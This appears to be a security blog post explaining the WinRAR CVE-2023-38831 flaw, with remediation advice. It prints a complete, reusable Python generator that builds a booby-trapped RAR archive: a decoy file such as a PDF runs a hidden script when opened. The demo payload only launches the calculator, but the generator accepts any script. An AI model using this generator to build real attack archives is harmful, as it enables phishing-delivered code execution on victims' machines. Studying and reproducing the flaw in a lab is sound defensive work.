Decoding the 0day: A Guide to WinRAR’s CVE-2023-38831 Vulnerability

In the evolving digital landscape, cybersecurity has never been more critical.

With new vulnerabilities cropping up almost daily, staying informed and prepared is our best defence.

This blog post focuses on an emerging security threat that has taken the cybersecurity world by storm – CVE-2023-38831.

Identified recently, this vulnerability affects one of the most widely used file archiver utility, WinRAR.

As we delve into the depths of what CVE-2023-38831 entails, we’ll also discuss how it can potentially impact millions of users worldwide and the steps you can take to safeguard your systems.

How Does the Vulnerability Work?

The WinRAR 0day vulnerability allows attackers to create malicious .RAR and .ZIP archives. These archives display seemingly harmless decoy files, like JPG images, text files, or PDFs. Users trigger the vulnerability when they double-click these files in WinRAR’s window.

Upon opening the document or image, the vulnerability causes execution of a cmd or bat script located in a folder with the same name in the current directory. This can install malware on the device or execute malicious commands.

However, EDR security guards on the host usually intercept these malicious commands. For demonstration purposes, we’ll use a script that launches the calculator (start calc).

The CVE-2023-38831 vulnerability in WinRAR has been exploited in the wild to target individual users involved in trading.

This vulnerability affects WinRAR versions lower than v6.23. This guide will walk you through the steps to reproduce this vulnerability.

Constructing the Vulnerable Compression Package

Here’s a Python script to generate a vulnerable compression package:

import shutil
import os, sys
from os.path import join
TEMPLATE_NAME = "TEMPLATE"
OUTPUT_NAME = "CVE-2023-38831-poc.rar"

BAIT_NAME = "CLASSIFIED_DOCUMENTS.pdf"
SCRIPT_NAME = "script.bat"

if len(sys.argv) > 3:
    BAIT_NAME = os.path.basename(sys.argv[1])
    SCRIPT_NAME = os.path.basename(sys.argv[2])
    OUTPUT_NAME = os.path.basename(sys.argv[3])
elif len(sys.argv) == 2 and sys.argv[1] == "poc":
    pass
else:
    print("""Usage:
          python .\cve-2023-38831-exp-gen.py poc
          python .\cve-2023-38831-exp-gen.py <BAIT_NAME> <SCRIPT_NAME> <OUTPUT_NAME>""")
    sys.exit()

BAIT_EXT = b"." + bytes(BAIT_NAME.split(".")[-1], "utf-8")

print("BAIT_NAME:", BAIT_NAME)
print("SCRIPT_NAME:", SCRIPT_NAME)
print("OUTPUT_NAME:", OUTPUT_NAME)

if os.path.exists(TEMPLATE_NAME):
    shutil.rmtree(TEMPLATE_NAME)
os.mkdir(TEMPLATE_NAME)
d = join(TEMPLATE_NAME, BAIT_NAME + "A")
if not os.path.exists(d):
    os.mkdir(d)

shutil.copyfile(join(SCRIPT_NAME), join(d, BAIT_NAME+"A.cmd"))
shutil.copyfile(join(BAIT_NAME), join(TEMPLATE_NAME, BAIT_NAME+"B"))

# if os.path.exists(OUTPUT_NAME):
#     print("!!! dir %s exists, delete it first" %(OUTPUT_NAME))
#     sys.exit()

shutil.make_archive(TEMPLATE_NAME, 'zip', TEMPLATE_NAME)

with open(TEMPLATE_NAME + ".zip", "rb") as f:
    content = f.read()
    content = content.replace(BAIT_EXT + b"A", BAIT_EXT + b" ")
    content = content.replace(BAIT_EXT + b"B", BAIT_EXT + b" ")

os.remove(TEMPLATE_NAME + ".zip")

with open(OUTPUT_NAME, "wb")  as f:
    f.write(content)

print("ok..")

Now, create a decoy file in the current folder (like a PDF, txt, or png). Then, create a script.bat file with the command “start calc”.

Run the Python script to generate the vulnerable RAR package:

python cve-2023-38831-exp-gen.py <bait name> <script name> <output name>

Verifying the Vulnerability

To verify the vulnerability, use WinRAR v6.21 on a Windows 10 environment. Open the compressed package in WinRAR and double-click the PDF file.

If the vulnerability is successfully exploited, the calculator app will launch. This vulnerability is commonly found in phishing email attachments.

Suggestions for Fixing the Vulnerability

To safeguard your system from the CVE-2023-38831 vulnerability in WinRAR, it’s vital to keep your software up-to-date.

Here are some elaborated steps to help ensure your protection:

  1. Immediate Software Update: As a primary step, make sure to update your WinRAR application to the latest version without delay. The developers of WinRAR continuously work on patching vulnerabilities and enhancing the software’s security. Therefore, keeping your software updated ensures that you benefit from these improvements and stay protected against known vulnerabilities.
  2. Regular Check for Updates: Often, users neglect or forget to check for updates, leaving their systems at risk. To prevent this, make it a routine to manually check for updates regularly. Alternatively, you can enable automatic updates if this feature is available. This way, your software will update itself whenever a new version is released.
  3. Download from Official Sources Only: Always download updates directly from the official WinRAR website or trusted sources. Third-party websites may provide compromised versions of the software, which could further expose your system to risks.
  4. Stay Informed: Keep yourself informed about the latest security threats and vulnerabilities related to the software you use. Following tech news or subscribing to security bulletins can help you stay aware of potential risks and understand when immediate action is needed.
  5. Use Antivirus Software: Regularly scan your system with reliable antivirus software. This can help detect and remove any malware that might exploit vulnerabilities in your system.
  6. Be Cautious with Unknown Files: Do not open files from unknown or untrusted sources. These could be attempts to exploit vulnerabilities like the CVE-2023-38831.

Remember, software updates are not just about adding new features; they also fix bugs and patch security vulnerabilities.

Hence, staying updated is one of the most effective ways to protect your system.

Conclusion

Confronting vulnerabilities like CVE-2023-38831 is a stark reminder of the constant vigilance required in today’s interconnected world.

Staying updated with the latest software versions, being cautious with files from unfamiliar sources, and employing robust antivirus software are few of the many steps you can undertake to mitigate such risks.